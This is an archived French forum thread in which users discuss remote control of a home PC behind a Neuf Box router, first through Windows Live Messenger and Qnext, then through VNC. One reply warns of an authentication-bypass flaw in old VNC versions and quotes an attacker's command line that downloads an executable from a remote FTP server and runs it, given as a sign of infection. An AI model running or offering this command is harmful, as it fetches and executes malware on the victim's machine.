Wiki - Forum Neuf - Recherche - ADSL
Version complète: Prise De Controle Avec Wlm Ou Qnext ?
Forums SFR NeufBox > Forums SFR > Forums Neuf Box > Neuf Box f@st 3302

Ganoo
Bonsoir à tous. smile.gif

Mon Pc tourne chez moi derrière une neuf box 3302 par le port ethernet. J'aimerais en prendre le controle à distance (en semaine je suis à 300 km de chez moi et j'utilise une connexion RTC).

J'ai lu que Windows Live Messenger permettait la prise de controle à distance mais je n'y parviens pas.

J'ai essayé avec Qnext en validant les ports 5235 à 5237 comme indiqué dans leur FAQ (voir ici (http://server.qnext.com/help/?t_id=1&pg_id=10)) et en suivant la méthode expliquée sur ce site mais pas moyen de faire passer la petite loupiotte rouge au vert blink.gif

Quelqu'un y est-il parvenu ?

Est-on vraiment condamné à utiliser un "tunnel VPN" pour cela comme j'ai pu le lire dans un autre topic ? Je trouve vraiment dommage que des applications comme Windows live messenger proposent ce genre de service si on ne peut pas les utiliser avec des modems courants. blink.gif
touffman
Le problème de la prise de controle à distance par Windows Messenger c'est qu'il faut que quelqu'un sur le PC dont tu veux prendre le controle en fasse la demande d'assistance, et qu'il t'autorise après à prendre le controle...

Essaye plutôt VNC (http://www.realvnc.com/). Je l'utilise sur tous les PCs que je veux pouvoir controler, et c'est un bonheur !!!
En Vano
CITATION(touffman @ Vendredi 06 Octobre 2006 À 22:31) *
Essaye plutôt VNC (http://www.realvnc.com/). Je l'utilise sur tous les PCs que je veux pouvoir controler, et c'est un bonheur !!!

Bonjour,

Veiller à bien prendre la dernière version VNC.

La précédente version, jusqu'à mai dernier, environ, présentait une faille sur laquelle VNC a très peu communiqué (attitude critiquable), faille exploitée au mois de septembre, qui consistait à contourner l'authentification et qui permettait à n'importe qui de prendre contrôle de votre machine.

Il y a environ 3 semaines, j'ai eu la désagréable surprise de voir la fenêtre DOS s'ouvrir sous mes yeux et des lignes de comandes en train de s'exécuter.

Ceux qui ont dans l'historique de leur fenêtre DOS des lignes du type :

cmd /c echo OPEN 83.179.112.91 16451>x&echo GET 84785_redworld2.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit

par exemple, ont peut-être de quoi s'inquiéter.

Il semble toutefois que la dernière version de VNC ait colmaté la brèche.

Cdlt,

E.
Ceci est une version "bas débit" de Justneuf. Pour voir la version complète avec plus d'information, la mise en page et les images, veuillez cliquer ici.